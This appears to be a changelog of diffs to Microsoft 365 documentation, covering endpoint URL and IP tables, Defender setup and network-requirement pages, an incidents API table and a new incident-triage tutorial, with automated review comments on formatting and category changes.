53 | Default<BR>Required | No | `ajax.aspnetcdn.com, apis.live.net, cdn.optimizely.com, officeapps.live.com, www.onedrive.com` | **TCP:** 443 56 | Allow<BR>Required | Yes | `*.msftidentity.com, *.msidentity.com, account.activedirectory.windowsazure.com, accounts.accesscontrol.windows.net, adminwebservice.microsoftonline.com, api.passwordreset.microsoftonline.com, autologon.microsoftazuread-sso.com, becws.microsoftonline.com, clientconfig.microsoftonline-p.net, companymanager.microsoftonline.com, device.login.microsoftonline.com, graph.microsoft.com, graph.windows.net, login.microsoft.com, login.microsoftonline.com, login.microsoftonline-p.com, login.windows.net, logincert.microsoftonline.com, loginex.microsoftonline.com, login-us.microsoftonline.com, nexus.microsoftonline-p.com, passwordreset.microsoftonline.com, provisioningapi.microsoftonline.com`<BR>`20.190.128.0/18, 40.126.0.0/18, 2603:1006:2000::/48, 2603:1007:200::/48, 2603:1016:1400::/48, 2603:1017::/48, 2603:1026:3000::/48, 2603:1027:1::/48, 2603:1036:3000::/48, 2603:1037:1::/48, 2603:1046:2000::/48, 2603:1047:1::/48, 2603:1056:2000::/48, 2603:1057:2::/48` | **TCP:** 443, 80 59 | Default<BR>Required | No | `*.hip.live.com, *.microsoftonline.com, *.microsoftonline-p.com, *.msauth.net, *.msauthimages.net, *.msecnd.net, *.msftauth.net, *.msftauthimages.net, *.phonefactor.net, enterpriseregistration.windows.net, management.azure.com, policykeyservice.dc.ad.msft.net` | **TCP:** 443, 80
-64 | Allow<BR>Required | Yes | `*.compliance.microsoft.com, *.manage.office.com, *.protection.office.com, *.security.microsoft.com, compliance.microsoft.com, manage.office.com, protection.office.com, security.microsoft.com`<BR>`13.80.125.22/32, 13.91.91.243/32, 13.107.6.156/31, 13.107.7.190/31, 13.107.9.156/31, 40.81.156.154/32, 40.90.218.198/32, 52.108.0.0/14, 52.174.56.180/32, 52.183.75.62/32, 52.184.165.82/32, 104.42.230.91/32, 157.55.145.0/25, 157.55.155.0/25, 157.55.227.192/26, 2603:1006:1400::/40, 2603:1010:2:2::a/128, 2603:1016:2400::/40, 2603:1020:400::26/128, 2603:1020:600::12f/128, 2603:1020:600::1f0/128, 2603:1020:800:2::45/128, 2603:1026:2400::/40, 2603:1030:7:5::25/128, 2603:1036:2400::/40, 2603:1040:400::5e/128, 2603:1040:601::2/128, 2603:1046:1400::/40, 2603:1056:1400::/40, 2a01:111:200a:a::/64, 2a01:111:2035:8::/64, 2a01:111:f100:1002::4134:c440/128, 2a01:111:f100:2000::a83e:33a8/128, 2a01:111:f100:2002::8975:2d98/128, 2a01:111:f100:3000::a83e:1884/128, 2a01:111:f100:3002::8987:3552/128, 2a01:111:f100:4002::9d37:c021/128, 2a01:111:f100:4002::9d37:c3de/128, 2a01:111:f100:6000::4134:a6c7/128, 2a01:111:f100:6000::4134:b84b/128, 2a01:111:f100:7000::6fdd:5245/128, 2a01:111:f100:7000::6fdd:6fc4/128, 2a01:111:f100:8000::4134:941b/128, 2a01:111:f100:9001::1761:914f/128, 2a01:111:f406:1::/64, 2a01:111:f406:c00::/64, 2a01:111:f406:1004::/64, 2a01:111:f406:1805::/64, 2a01:111:f406:3404::/64, 2a01:111:f406:8000::/64, 2a01:111:f406:8801::/64, 2a01:111:f406:a003::/64` | **TCP:** 443
-65 | Allow<BR>Required | Yes | `*.portal.cloudappsecurity.com, account.office.net, admin.microsoft.com, home.office.com, portal.office.com, www.office.com`<BR>`13.80.125.22/32, 13.91.91.243/32, 13.107.6.156/31, 13.107.7.190/31, 13.107.9.156/31, 40.81.156.154/32, 40.90.218.198/32, 52.108.0.0/14, 52.174.56.180/32, 52.183.75.62/32, 52.184.165.82/32, 104.42.230.91/32, 157.55.145.0/25, 157.55.155.0/25, 157.55.227.192/26, 2603:1006:1400::/40, 2603:1010:2:2::a/128, 2603:1016:2400::/40, 2603:1020:400::26/128, 2603:1020:600::12f/128, 2603:1020:600::1f0/128, 2603:1020:800:2::45/128, 2603:1026:2400::/40, 2603:1030:7:5::25/128, 2603:1036:2400::/40, 2603:1040:400::5e/128, 2603:1040:601::2/128, 2603:1046:1400::/40, 2603:1056:1400::/40, 2a01:111:200a:a::/64, 2a01:111:2035:8::/64, 2a01:111:f100:1002::4134:c440/128, 2a01:111:f100:2000::a83e:33a8/128, 2a01:111:f100:2002::8975:2d98/128, 2a01:111:f100:3000::a83e:1884/128, 2a01:111:f100:3002::8987:3552/128, 2a01:111:f100:4002::9d37:c021/128, 2a01:111:f100:4002::9d37:c3de/128, 2a01:111:f100:6000::4134:a6c7/128, 2a01:111:f100:6000::4134:b84b/128, 2a01:111:f100:7000::6fdd:5245/128, 2a01:111:f100:7000::6fdd:6fc4/128, 2a01:111:f100:8000::4134:941b/128, 2a01:111:f100:9001::1761:914f/128, 2a01:111:f406:1::/64, 2a01:111:f406:c00::/64, 2a01:111:f406:1004::/64, 2a01:111:f406:1805::/64, 2a01:111:f406:3404::/64, 2a01:111:f406:8000::/64, 2a01:111:f406:8801::/64, 2a01:111:f406:a003::/64` | **TCP:** 443, 80
+64 | Allow<BR>Required | Yes | `*.compliance.microsoft.com, *.manage.office.com, *.protection.office.com, *.security.microsoft.com, compliance.microsoft.com, manage.office.com, protection.office.com, security.microsoft.com`<BR>`52.108.0.0/14, 2603:1006:1400::/40, 2603:1016:2400::/40, 2603:1026:2400::/40, 2603:1036:2400::/40, 2603:1046:1400::/40, 2603:1056:1400::/40, 2a01:111:200a:a::/64, 2a01:111:2035:8::/64, 2a01:111:f406:1::/64, 2a01:111:f406:c00::/64, 2a01:111:f406:1004::/64, 2a01:111:f406:1805::/64, 2a01:111:f406:3404::/64, 2a01:111:f406:8000::/64, 2a01:111:f406:8801::/64, 2a01:111:f406:a003::/64` | **TCP:** 443
+65 | Allow<BR>Required | Yes | `*.portal.cloudappsecurity.com, account.office.net, home.office.com, www.office.com`<BR>`52.108.0.0/14, 2603:1006:1400::/40, 2603:1016:2400::/40, 2603:1026:2400::/40, 2603:1036:2400::/40, 2603:1046:1400::/40, 2603:1056:1400::/40, 2a01:111:200a:a::/64, 2a01:111:2035:8::/64, 2a01:111:f406:1::/64, 2a01:111:f406:c00::/64, 2a01:111:f406:1004::/64, 2a01:111:f406:1805::/64, 2a01:111:f406:3404::/64, 2a01:111:f406:8000::/64, 2a01:111:f406:8801::/64, 2a01:111:f406:a003::/64` | **TCP:** 443, 80
66 | Default<BR>Required | No | `suite.office.net` | **TCP:** 443 67 | Default<BR>Optional<BR>**Notes:** Security and Compliance Center eDiscovery export | No | `*.blob.core.windows.net` | **TCP:** 443 68 | Default<BR>Optional<BR>**Notes:** Portal and shared: 3rd party office integration. (including CDNs) | No | `*.helpshift.com, *.localytics.com, analytics.localytics.com, api.localytics.com, connect.facebook.net, firstpartyapps.oaspapps.com, outlook.uservoice.com, prod.firstpartyapps.oaspapps.com.akadns.net, rink.hockeyapp.net, sdk.hockeyapp.net, telemetryservice.firstpartyapps.oaspapps.com, web.localytics.com, webanalytics.localytics.com, wus-firstpartyapps.oaspapps.com` | **TCP:** 443
ID | Category | ER | Addresses | Ports
72 | Default<BR>Optional<BR>**Notes:** Azure Rights Management (RMS) with Office 2010 clients | No | `*.cloudapp.net` | **TCP:** 443 73 | Default<BR>Required | No | `*.aadrm.com, *.azurerms.com, *.informationprotection.azure.com, ecn.dev.virtualearth.net, informationprotection.hosting.portal.azure.net` | **TCP:** 443 74 | Default<BR>Optional<BR>**Notes:** Remote Connectivity Analyzer - Initiate connectivity tests. | No | `testconnectivity.microsoft.com` | **TCP:** 443, 80
-75 | Default<BR>Optional<BR>**Notes:** Graph.windows.net, Office 365 Management Pack for Operations Manager, SecureScore, Azure AD Device Registration, Forms, StaffHub, Application Insights, captcha services | No | `*.hockeyapp.net, *.sharepointonline.com, cdn.forms.office.net, dc.applicationinsights.microsoft.com, dc.services.visualstudio.com, forms.microsoft.com, mem.gfx.ms, office365servicehealthcommunications.cloudapp.net, osiprod-cus-daffodil-signalr-00.service.signalr.net, osiprod-neu-daffodil-signalr-00.service.signalr.net, osiprod-weu-daffodil-signalr-00.service.signalr.net, osiprod-wus-daffodil-signalr-00.service.signalr.net, signup.microsoft.com, staffhub.ms, staffhub.uservoice.com, staffhubweb.azureedge.net, watson.telemetry.microsoft.com` | **TCP:** 443
-77 | Allow<BR>Required | Yes | `portal.microsoftonline.com`<BR>`13.107.6.171/32, 13.107.140.6/32, 52.108.0.0/14, 52.238.106.116/32, 52.244.37.168/32, 52.244.203.72/32, 52.244.207.172/32, 52.244.223.198/32, 52.247.150.191/32, 2603:1010:2::cb/128, 2603:1010:200::c7/128, 2603:1020:200::682f:a0fd/128, 2603:1020:201:9::c6/128, 2603:1020:600::a1/128, 2603:1020:700::a2/128, 2603:1020:800:2::6/128, 2603:1020:900::8/128, 2603:1030:7::749/128, 2603:1030:800:5::bfee:ad3c/128, 2603:1030:f00::17/128, 2603:1030:1000::21a/128, 2603:1040:200::4f3/128, 2603:1040:401::762/128, 2603:1040:601::60f/128, 2603:1040:a01::1e/128, 2603:1040:c01::28/128, 2603:1040:e00:1::2f/128, 2603:1040:f00::1f/128, 2603:1050:1::cd/128, 2620:1ec:8fc::6/128, 2620:1ec:a92::171/128, 2a01:111:f100:2000::a83e:3019/128, 2a01:111:f100:2002::8975:2d79/128, 2a01:111:f100:2002::8975:2da8/128, 2a01:111:f100:7000::6fdd:6cd5/128, 2a01:111:f100:a004::bfeb:88cf/128` | **TCP:** 443
+75 | Default<BR>Optional<BR>**Notes:** Graph.windows.net, Office 365 Management Pack for Operations Manager, SecureScore, Azure AD Device Registration, Forms, StaffHub, Application Insights, captcha services | No | `*.hockeyapp.net, *.sharepointonline.com, cdn.forms.office.net, dc.applicationinsights.microsoft.com, dc.services.visualstudio.com, forms.microsoft.com, mem.gfx.ms, office365servicehealthcommunications.cloudapp.net, signup.microsoft.com, staffhub.ms, staffhub.uservoice.com, staffhubweb.azureedge.net, watson.telemetry.microsoft.com` | **TCP:** 443
78 | Default<BR>Optional<BR>**Notes:** Some Office 365 features require endpoints within these domains (including CDNs). Many specific FQDNs within these wildcards have been published recently as we work to either remove or better explain our guidance relating to these wildcards. | No | `*.microsoft.com, *.msocdn.com, *.office.net, *.onmicrosoft.com` | **TCP:** 443, 80 79 | Default<BR>Required | No | `o15.officeredir.microsoft.com, officepreviewredir.microsoft.com, officeredir.microsoft.com, r.office.microsoft.com` | **TCP:** 443, 80
-80 | Default<BR>Required | No | `ocws.officeapps.live.com` | **TCP:** 443
-81 | Default<BR>Required | No | `odc.officeapps.live.com` | **TCP:** 443, 80
82 | Default<BR>Required | No | `roaming.officeapps.live.com` | **TCP:** 443, 80 83 | Default<BR>Required | No | `activation.sls.microsoft.com` | **TCP:** 443 84 | Default<BR>Required | No | `crl.microsoft.com` | **TCP:** 443, 80
ID | Category | ER | Addresses | Ports
89 | Default<BR>Required | No | `go.microsoft.com, support.office.com` | **TCP:** 443, 80 91 | Default<BR>Required | No | `ajax.aspnetcdn.com` | **TCP:** 443, 80 92 | Default<BR>Required | No | `officecdn.microsoft.com, officecdn.microsoft.com.edgesuite.net` | **TCP:** 443, 80
-93 | Default<BR>Optional<BR>**Notes:** ProPlus: auxiliary URLs | No | `*.virtualearth.net, ajax.microsoft.com, c.bing.net, excelbingmap.firstpartyapps.oaspapps.com, excelcs.officeapps.live.com, ocos-office365-s2s.msedge.net, omextemplates.content.office.net, peoplegraph.firstpartyapps.oaspapps.com, pptcs.officeapps.live.com, tse1.mm.bing.net, uci.officeapps.live.com, watson.microsoft.com, wikipedia.firstpartyapps.oaspapps.com, wordcs.officeapps.live.com, www.bing.com` | **TCP:** 443, 80
+93 | Default<BR>Optional<BR>**Notes:** ProPlus: auxiliary URLs | No | `*.virtualearth.net, ajax.microsoft.com, c.bing.net, excelbingmap.firstpartyapps.oaspapps.com, ocos-office365-s2s.msedge.net, omextemplates.content.office.net, peoplegraph.firstpartyapps.oaspapps.com, tse1.mm.bing.net, watson.microsoft.com, wikipedia.firstpartyapps.oaspapps.com, www.bing.com` | **TCP:** 443, 80
95 | Default<BR>Optional<BR>**Notes:** Outlook for Android and iOS | No | `*.acompli.net, *.outlookmobile.com` | **TCP:** 443 96 | Default<BR>Optional<BR>**Notes:** Outlook for Android and iOS: Authentication | No | `*.manage.microsoft.com, api.office.com, go.microsoft.com, login.windows-ppe.net, secure.aadcdn.microsoftonline-p.com, vortex.data.microsoft.com` | **TCP:** 443 97 | Default<BR>Optional<BR>**Notes:** Outlook for Android and iOS: Consumer Outlook.com and OneDrive integration | No | `account.live.com, apis.live.net, auth.gfx.ms, login.live.com` | **TCP:** 443
ID | Category | ER | Addresses | Ports
128 | Default<BR>Required | No | `*.config.office.net, *.manage.microsoft.com` | **TCP:** 443 147 | Default<BR>Required | No | `*.office.com` | **TCP:** 443, 80 148 | Default<BR>Required | No | `cdnprod.myanalytics.microsoft.com, myanalytics.microsoft.com, myanalytics-gcc.microsoft.com` | **TCP:** 443, 80
-149 | Default<BR>Required | No | `workplaceanalytics.cdn.office.net, workplaceanalytics.office.com` | **TCP:** 443, 80
+149 | Default<BR>Required | No | `workplaceanalytics.cdn.office.net` | **TCP:** 443, 80
150 | Default<BR>Optional<BR>**Notes:** Blocking these endpoints will affect the ability to access the Office 365 ProPlus deployment and management features via the portal. | No | `*.officeconfig.msocdn.com` | **TCP:** 443 152 | Default<BR>Optional<BR>**Notes:** These endpoints enables the Office Scripts functionality in Office clients available through the Automate tab. This feature can also be disabled through the Office 365 Admin portal. | No | `*.microsoftusercontent.com` | **TCP:** 443 153 | Default<BR>Required | No | `*.azure-apim.net, *.flow.microsoft.com, *.powerapps.com` | **TCP:** 443 156 | Default<BR>Required | No | `activity.windows.com` | **TCP:** 443 157 | Default<BR>Required | No | `ocsp.int-x3.letsencrypt.org` | **TCP:** 80
+158 | Default<BR>Required | No | `*.cortana.ai` | **TCP:** 443
+159 | Default<BR>Required | No | `admin.microsoft.com, portal.microsoftonline.com, portal.office.com` | **TCP:** 443, 80
+160 | Default<BR>Required | No | `cdn.odc.officeapps.live.com, cdn.uci.officeapps.live.com` | **TCP:** 443, 80
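Review bot: `admin.microsoft.com` and `portal.office.com` (taken out of row 65) and `portal.microsoftonline.com` (row 77, removed) come back in new row 159 as Default, ER "No", with no IP ranges, where they were previously Allow, ER "Yes", with published addresses. That is a category change and not a renumbering: an allow list built on the published prefixes no longer has any prefix to match for these portal hosts, and nothing in the page says so. Rows 64 and 65 similarly lose the long list of individual IPv4 and IPv6 entries and keep only `52.108.0.0/14` plus the /40 and /64 IPv6 prefixes, and rows 80 and 81 (`ocws.officeapps.live.com`, `odc.officeapps.live.com`) are removed while row 160 adds `cdn.odc.officeapps.live.com` and `cdn.uci.officeapps.live.com`. A short summary of these moves alongside the version bump to 2021042900 would make the update reviewable for firewall and proxy owners.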
knowledge Topic Experiences Security Privacy https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/knowledge/topic-experiences-security-privacy.md
The following table describes what users - topic viewers, contributors, and know
## Best practices
-Topics presents information to users based on their existing permissions to content. Microsoft 365 provides a variety of ways to ensure that sensitive content is restricted to appropriate users. Beyond standard team or site permissions, you can use [sensitivity labels](../compliance/sensitivity-labels.md) or [data loss prevention](../compliance/data-loss-prevention-policies.md) to restrict access to content and [access reviews](/azure/active-directory/governance/access-reviews-overview) to periodically review user access to sensitive information.
+Topics presents information to users based on their existing permissions to content. Microsoft 365 provides a variety of ways to ensure that sensitive content is restricted to appropriate users. Beyond standard team or site permissions, you can use [sensitivity labels](../compliance/sensitivity-labels.md) or [data loss prevention](../compliance/dlp-learn-about-dlp.md) to restrict access to content and [access reviews](/azure/active-directory/governance/access-reviews-overview) to periodically review user access to sensitive information.
We recommend that you use these tools to ensure that your content permissions are set appropriately inside your organization. Topic experiences can then provide useful and appropriate information to your users.
security Enable Cloud Protection Microsoft Defender Antivirus https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/enable-cloud-protection-microsoft-defender-antivirus.md
ms.sitesec: library
localization_priority: normal Previously updated : 11/13/2020 Last updated : 04/30/2021
Microsoft Defender Antivirus uses multiple detection and prevention technologies
You can turn Microsoft Defender Antivirus cloud-delivered protection on or off in several ways: - Microsoft Intune-- Microsoft Endpoint Configuration Manager
+- Microsoft Endpoint Manager
- Group Policy - PowerShell cmdlets.
For more information about the specific network-connectivity requirements to ens
## Use Intune to turn on cloud-delivered protection 1. Go to the Microsoft Endpoint Manager admin center ([https://endpoint.microsoft.com](https://endpoint.microsoft.com)) and log in.+ 2. On the **Home** pane, select **Device configuration > Profiles**.+ 3. Select the **Device restrictions** profile type you want to configure. If you need to create a new **Device restrictions** profile type, see [Configure device restriction settings in Microsoft Intune](/intune/device-restrictions-configure).+ 4. Select **Properties** > **Configuration settings: Edit** > **Microsoft Defender Antivirus**.+ 5. On the **Cloud-delivered protection** switch, select **Enable**.+ 6. In the **Prompt users before sample submission** dropdown, select **Send all data automatically**. For more information about Intune device profiles, including how to create and configure their settings, see [What are Microsoft Intune device profiles?](/intune/device-profiles)
For more information about Intune device profiles, including how to create and c
## Use Microsoft Endpoint Manager to turn on cloud-delivered protection 1. Go to the Microsoft Endpoint Manager admin center ([https://endpoint.microsoft.com](https://endpoint.microsoft.com)) and log in.+ 2. Choose **Endpoint security** > **Antivirus**.+ 3. Select an antivirus profile. (If you don't have one yet, or if you want to create a new profile, see [Configure device restriction settings in Microsoft Intune](/intune/device-restrictions-configure).+ 4. Select **Properties**. Then, next to **Configuration settings**, choose **Edit**.+ 5. Expand **Cloud protection**, and then in the **Cloud-delivered protection level** list, select one of the following:
- 1. **High**: Applies a strong level of detection.
- 2. **High plus**: Uses the **High** level and applies additional protection measures (may impact client performance).
- 3. **Zero tolerance**: Blocks all unknown executables.
+ - **High**: Applies a strong level of detection.
+ - **High plus**: Uses the **High** level and applies additional protection measures (may impact client performance).
+ - **Zero tolerance**: Blocks all unknown executables.
+ 6. Select **Review + save**, then choose **Save**. For more information about configuring Microsoft Endpoint Configuration Manager, see [How to create and deploy antimalware policies: Cloud-protection service](/configmgr/protect/deploy-use/endpoint-antimalware-policies#cloud-protection-service).
For more information about configuring Microsoft Endpoint Configuration Manager,
>[!NOTE] > The **Send safe samples** (1) option means that most samples will be sent automatically. Files that are likely to contain personal information will still prompt and require additional confirmation.-
- > [!WARNING]
> Setting the option to **Always Prompt** (0) will lower the protection state of the device. Setting it to **Never send** (2) means that the [Block at First Sight](configure-block-at-first-sight-microsoft-defender-antivirus.md) feature of Microsoft Defender for Endpoint won't work. 7. Select **OK**.
For more information about allowed parameters, see [Windows Defender WMIv2 APIs]
- [Defender cmdlets](/powershell/module/defender/) - [Use Microsoft cloud-delivered protection in Microsoft Defender Antivirus](cloud-protection-microsoft-defender-antivirus.md) - [How to create and deploy antimalware policies: Cloud-protection service](/configmgr/protect/deploy-use/endpoint-antimalware-policies#cloud-protection-service)-- [Microsoft Defender Antivirus in Windows 10](microsoft-defender-antivirus-in-windows-10.md)
+- [Microsoft Defender Antivirus in Windows 10](microsoft-defender-antivirus-in-windows-10.md)
security Linux Install With Ansible https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/linux-install-with-ansible.md
Before you get started, see [the main Defender for Endpoint on Linux page](micro
In addition, for Ansible deployment, you need to be familiar with Ansible administration tasks, have Ansible configured, and know how to deploy playbooks and tasks. Ansible has many ways to complete the same task. These instructions assume availability of supported Ansible modules, such as *apt* and *unarchive* to help deploy the package. Your organization might use a different workflow. Refer to the [Ansible documentation](https://docs.ansible.com/) for details. -- Ansible needs to be installed on at least one computer (we will call it the primary computer).-- SSH must be configured for an administrator account between the primary computer and all clients, and it is recommended be configured with public key authentication.-- The following software must be installed on all clients:
+- Ansible needs to be installed on at least one computer (Ansible calls this the control node).
+- SSH must be configured for an administrator account between the control node and all managed nodes (devices that will have Defender for Endpoint installed on them), and it is recommended to be configured with public key authentication.
+- The following software must be installed on all managed nodes:
- curl - python-apt -- All hosts must be listed in the following format in the `/etc/ansible/hosts` or relevant file:
+- All managed nodes must be listed in the following format in the `/etc/ansible/hosts` or relevant file:
```bash [servers]
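Review bot: In the SSH prerequisite bullet, "it is recommended to be configured with public key authentication" is still awkward after the fix; "we recommend configuring it with public key authentication" is clearer. The switch to "control node" and "managed nodes" is consistent across the changed bullets, but the inventory example that follows still uses a `[servers]` group, so a short sentence tying that group name to the managed nodes would help readers map the terms.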
security Microsoft Defender Endpoint Android https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/microsoft-defender-endpoint-android.md
This topic describes how to install, configure, update, and use Defender for End
- Access [Microsoft Endpoint Manager admin center](https://go.microsoft.com/fwlink/?linkid=2109431), to deploy the app to enrolled user groups in your organization.
+
+###Network Requirements
+- For Microsoft Defender for Endpoint on Android to function when connected to a network the firewall/proxy will need to be configured to [enable access to Microsoft Defender for Endpoint service URLs](configure-proxy-internet.md#enable-access-to-microsoft-defender-for-endpoint-service-urls-in-the-proxy-server)
+-
### System Requirements - Android devices running Android 6.0 and above.
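Review bot: The new heading `###Network Requirements` has no space after the `###`, so many Markdown renderers will show it as literal text rather than a heading; write it as `### Network Requirements` to match the existing `### System Requirements`. The hunk also adds an empty bullet (`-` with no text) after the firewall/proxy item, which should be dropped, and the firewall/proxy sentence is missing its closing period.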
security Microsoft Defender Endpoint Ios https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/microsoft-defender-endpoint-ios.md
iOS devices along with other platforms.
- Access to [Microsoft Endpoint Manager admin center](https://go.microsoft.com/fwlink/?linkid=2109431), to deploy the app to enrolled user groups in your organization.
+**Network Requirements**
+- For Microsoft Defender for Endpoint on iOS to function when connected to a network the firewall/proxy will need to be configured to [enable access to Microsoft Defender for Endpoint service URLs](configure-proxy-internet.md#enable-access-to-microsoft-defender-for-endpoint-service-urls-in-the-proxy-server)
+ **System Requirements** - iOS devices running iOS 11.0 and above. iPad devices are officially supported from version 1.1.15010101 onward.
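Review bot: `**Network Requirements**` is added directly after the Endpoint Manager bullet with no blank line between them, so Markdown can treat it as a continuation of that list item instead of a new block; add a blank line before it. The Android article in the same change set uses a `###` heading for the same section while this one uses bold text, so pick one form for both. The firewall/proxy sentence also lacks a closing period.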
security Api Update Incidents https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender/api-update-incidents.md
In the request body, supply the values for the fields that should be updated. Ex
Property | Type | Description -|-|-
-status | Enum | Specifies the current status of the alert. Possible values are: ```Active```, ```Resolved```, and ```Redirected```.
+status | Enum | Specifies the current status of the incident. Possible values are: ```Active```, ```Resolved```, and ```Redirected```.
assignedTo | string | Owner of the incident.
-classification | Enum | Specification of the alert. Possible values are: ```Unknown```, ```FalsePositive```, ```TruePositive```.
-determination | Enum | Specifies the determination of the alert. Possible values are: ```NotAvailable```, ```Apt```, ```Malware```, ```SecurityPersonnel```, ```SecurityTesting```, ```UnwantedSoftware```, ```Other```.
+classification | Enum | Specification of the incident. Possible values are: ```Unknown```, ```FalsePositive```, ```TruePositive```.
+determination | Enum | Specifies the determination of the incident. Possible values are: ```NotAvailable```, ```Apt```, ```Malware```, ```SecurityPersonnel```, ```SecurityTesting```, ```UnwantedSoftware```, ```Other```.
tags | string List | List of Incident tags. ## Response
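Review bot: In the `classification` row, "Specification of the incident" is still vague after the alert-to-incident rename; "Specifies the classification of the incident" would match the wording of the `status` and `determination` rows. The enum values in all three changed rows are wrapped in triple backticks inline, where single backticks are the usual inline code form.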
security First Incident Analyze https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender/first-incident-analyze.md
+
+ Title: Step 1. Triage and analyze your first incident
+description: How to triage and begin the analysis of your first incident in Microsoft 365 Defender.
+keywords: incidents, alerts, investigate, correlation, attack, machines, devices, users, identities, identity, mailbox, email, 365, microsoft, m365, incident response, cyber-attack
+search.product: eADQiWindows 10XVcnh
+ms.mktglfcycl: deploy
+ms.sitesec: library
+ms.pagetype: security
+f1.keywords:
+ - NOCSH
++
+localization_priority: Normal
+
+audience: ITPro
+
+ - M365-security-compliance
+ - m365initiative-m365-defender
+
+search.appverid:
+ - MOE150
+ - MET150
+ms.technology: m365d
+
+# Step 1. Triage and analyze your first incident
++
+**Applies to:**
+- Microsoft 365 Defender
+
+As you spend some time establishing, implementing, and maintaining security measures according to the organizationΓÇÖs standards, you can set up security solutions to help you quickly identify security risks and threats. Microsoft 365 Defender allows you to detect, triage, and investigate incidents through its single-pane-of-glass experience where you can find the information you need to make timely decisions.
+
+Once a security incident is detected, Microsoft 365 Defender presents details you will need to triage or prioritize an incident or incidents over others. After determining prioritization, analysts can then focus their energy on investigating cases assigned to them.
+
+## Detection by Microsoft 365 Defender
+
+Microsoft 365 Defender receives alerts and events from multiple Microsoft security platforms as detection sources to create a holistic picture and context of malicious activity. These are the possible detection sources:
+
+- [Microsoft Defender for Endpoint](../defender-endpoint/microsoft-defender-endpoint.md) is an endpoint detection and response solution (EDR) that uses Microsoft Defender antivirus as well as cloud-enabled advanced threat protection using Microsoft Security Graph. Defender for Endpoint is a unified platform for preventative protection, post-breach detection, automated investigation, and response. It protects endpoints from cyberthreats, detects advanced attacks and data breaches, automates security incidents, and improves security posture.
+- [Microsoft Defender for Identity](https://docs.microsoft.com/defender-for-identity/what-is) is a cloud-based security solution that uses your on-premises Active Directory Domain Services (AD DS) signals to identify, detect, and investigate advanced threats, compromised identities, and malicious insider actions directed at your organization.
+- [Microsoft Cloud App Security](https://docs.microsoft.com/cloud-app-security/) acts as a gatekeeper to broker access in real time between your enterprise users and the cloud resources they use, wherever your users are located and regardless of the device they are using.
+- [Microsoft Defender for Office 365](../office-365-security/overview.md) safeguards your organization against malicious threats in email messages, links (URLs), and collaboration tools.
+- [Azure Security Center](https://docs.microsoft.com/azure/security-center/security-center-introduction) is a unified infrastructure security management system that strengthens the security posture of your data centers and provides advanced threat protection across your hybrid workloads in the cloud as well as on premises.
+
+In Microsoft 365 Defender, [incidents](incidents-overview.md) are identified by correlating alerts from these different detection sources. Instead of spending resources stringing together or distinguishing multiple alerts into their respective incidents, you can start with the incident queue in Microsoft 365 Defender right away. This allows you to triage incidents in an efficient manner across endpoints, identities, email, and applications, and reduce the damage from an attack.
+
+## Triage your incidents
+
+Incident response in Microsoft 365 Defender starts once you triage the list of incidents using your organizationΓÇÖs recommended method of prioritization. To triage means to assign a level of importance or urgency to incidents, which then determines the order in which they will be investigated.
+
+A useful sample guide for determining which incident to prioritize in Microsoft 365 Defender can be summarized by the formula: *Severity + Impact = Priority*.
+
+- **Severity** is the level designated by Microsoft 365 Defender and its integrated security components.
+- **Impact** is determined by the organization and generally includes, but not limited to, a threshold number of impacted users, devices, services affected (or a combination thereof), and even alert type.
+
+Analysts then initiate investigations based on the **Priority** criteria set by the organization.
+
+Incident prioritization might vary depending on the organization. NIST recommends also considering the functional and informational impact of the incident, and recoverability.
+
+The following is just one approach to triage:
+
+1. Go to the [incidents](incidents-overview.md) page to initiate triage. Here you can see a list of incidents affecting your organization. By default, they are arranged from the most recent to the oldest incident. From here, you can also see different columns for each incident showing their severity, category, number of active alerts, and impacted entities, among others. You can customize the set of columns and sort the incident queue by some these columns by selecting the column name. You can also filter the incident queue according to your needs. For a full list of available filters, see [Prioritize incidents](incident-queue.md#available-filters).
+
+ :::image type="content" source="../../media/first-incident-analyze/first-incident-analyze-queue.png" alt-text="Example of the incident queue":::
+
+ One example of how you might perform triage for this set of incidents is to prioritize incidents that affected more users and devices. In this example, you might prioritize incident ID 6769 because it affected the largest number of entities: 7 devices, 6 users, and 2 mailboxes. Furthermore, the incident appears to contain alerts from Microsoft Defender for Identity which indicate an identity-based alert and possible credential theft.
+
+ :::image type="content" source="../../media/first-incident-analyze/first-incident-analyze-high-impact.png" alt-text="Example of a high-impact incident":::
+
+2. Select the circle next to the incident name to review the details. A side pane will appear on the right side, which contains additional information that can assist your triage further.
+
+ :::image type="content" source="../../media/first-incident-analyze/first-incident-analyze-incident-flyout.png" alt-text="Example of an incident side pane":::
+
+ For example, by looking at which [MITRE ATT&CK](https://attack.mitre.org/) tactics the attacker used based on the incidentΓÇÖs categories, you might prioritize this incident because the attacker used stolen credentials, established command and control, performed lateral movement, and exfiltrated some data. This suggests the attacker has already gone deep into the network and possibly stolen confidential information.
+
+ Additionally, if your organization has implemented the Zero Trust framework, you would consider credential access as an important security violation worth prioritizing.
+
+ Scrolling down the side pane, you will see the specific impacted entities such as users, devices, and mailboxes. You can check the exposure level of each device and the owners of affected mailboxes.
+
+ :::image type="content" source="../../media/first-incident-analyze/first-incident-analyze-incident-flyout-details.png" alt-text="Example of an incident side pane details":::
+
+3. Further down the side pane, you can find the associated alerts. Microsoft 365 Defender has already performed the correlation of said alerts into a single incident, saving you time and resources better spent remediating the attack. Alerts are suspicious and therefore possibly malicious system events that suggest the presence of an attacker on a network.
+
+ In this example, 87 individual alerts were determined to be part of one security incident. You can view all the alerts to get a quick view of how the attack played out.
+
+ :::image type="content" source="../../media/first-incident-analyze/first-incident-analyze-incident-flyout-alerts.png" alt-text="Example of alerts in an incident side pane":::
+
+## Analyze your first incident
+
+Understanding the context surrounding alerts is equally important. Often an alert is not a single independent event. There is a chain of processes created, commands, and actions that might not have occurred at the same time. Therefore, an analyst must look for the first and last activities of the suspicious entity in device timelines to understand the context of the alerts.
+
